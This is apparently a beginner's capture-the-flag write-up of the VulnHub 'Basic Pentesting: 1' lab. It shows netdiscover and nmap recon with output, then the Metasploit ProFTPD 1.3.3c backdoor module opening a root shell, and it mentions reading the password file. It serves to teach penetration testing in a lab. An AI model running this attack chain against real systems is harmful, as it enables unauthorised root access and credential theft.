Basic Pentest 1

Hello user

And welcome to my attempt at the Basic Pentesting: 1 box available from vuln hub here 

After setting up and booting up the machine i discover it using the netdiscover tool which looks up ARP (Address resolution protocol) requests.

using the following command netdiscover will passivly listen for ARP requests on my network and tell me so i can find the box.

root@kali:~# netdiscover -p 

Currently scanning: (passive)   |   Screen View: Unique Hosts                                                                                
                                                                                                                                              
 ________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 ------------------------------------------------------------------------
 192.168.128.12  08:00:27:14:06:50      4     240  PCS Systemtechnik GmbH                                                                     

Fantastic, it found the IP of the target device. Lets give that a thorough scan with nmap

I use the following command as my default scan of any new target.

nmap -A -sS -sV -p 1-65535 -T4 192.168.128.12

it tells nmap to TCP SYN scan all ports with OS, version, and script scanning detection using an aggressive time option (the range being from 0 (paranoid) to 5 (insane))

we get the following output.

root@kali:~# nmap -A -sS -sV -p 1-65535 -T4 192.168.128.12

Starting Nmap 7.60 ( https://nmap.org ) at 2019-03-13 05:43 EDT
Nmap scan report for 192.168.128.12
Host is up (0.00035s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.3c
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
| 2048 d6:01:90:39:2d:8f:46:fb:03:86:73:b3:3c:54:7e:54 (RSA)
| 256 f1:f3:c0:dd:ba:a4:85:f7:13:9a:da:3a:bb:4d:93:04 (ECDSA)
|_ 256 12:e2:98:d2:a3:e7:36:4f:be:6b:ce:36:6b:7e:0d:9e (EdDSA)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:14:06:50 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.35 ms 192.168.128.12

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.54 seconds

ok so lets start with the FTP (file transfer protocol) service nmap detected. That looks vulnerable as hell.

Lets fire fire up metasploit and see if we can find any exploits for it.

root@kali:~# service postgresql start
root@kali:~# msfdb init
A database appears to be already configured, skipping initialization
root@kali:~# msfconsole


=[ metasploit v4.16.35-dev ]
+ -- --=[ 1732 exploits - 990 auxiliary - 300 post ]
+ -- --=[ 509 payloads - 40 encoders - 10 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > search proftpd 1.3.3c

Matching Modules
================


Yah so i’m going to screen shot from now on that’s way easier lmao.

Metasploit has a bunch of exploits but we are going to try the ProFTPD-1.3.3c Backdoor Command Execution one so we select it by specifying its destiantion with a use command like so.

msf > use exploit/unix/ftp/proftpd_133c_backdoor

Cool, when using metasploit you can check what you need to configure by typing options, after we type options we can see we only need to set the remote host (target) ip, which we do as shown.

Ok so after configuring that we can run the exploit by typing run, or exploit, either way, it works and we are informed a shell is opened.

to confirm we have root privileges/check what privileges we have use the whoami command and then to really drive the point home try to do something only the root user could do, like cat (view) the password file

 

cool, so we got root access very easily and on our first attempt, this is likely because we are doing a beginner CTF which is intended to be easy to compromise, it is very unlikely future CTF’s will be this easy but thats good or else it would be very boring!

and if ya don’t know, now ya know.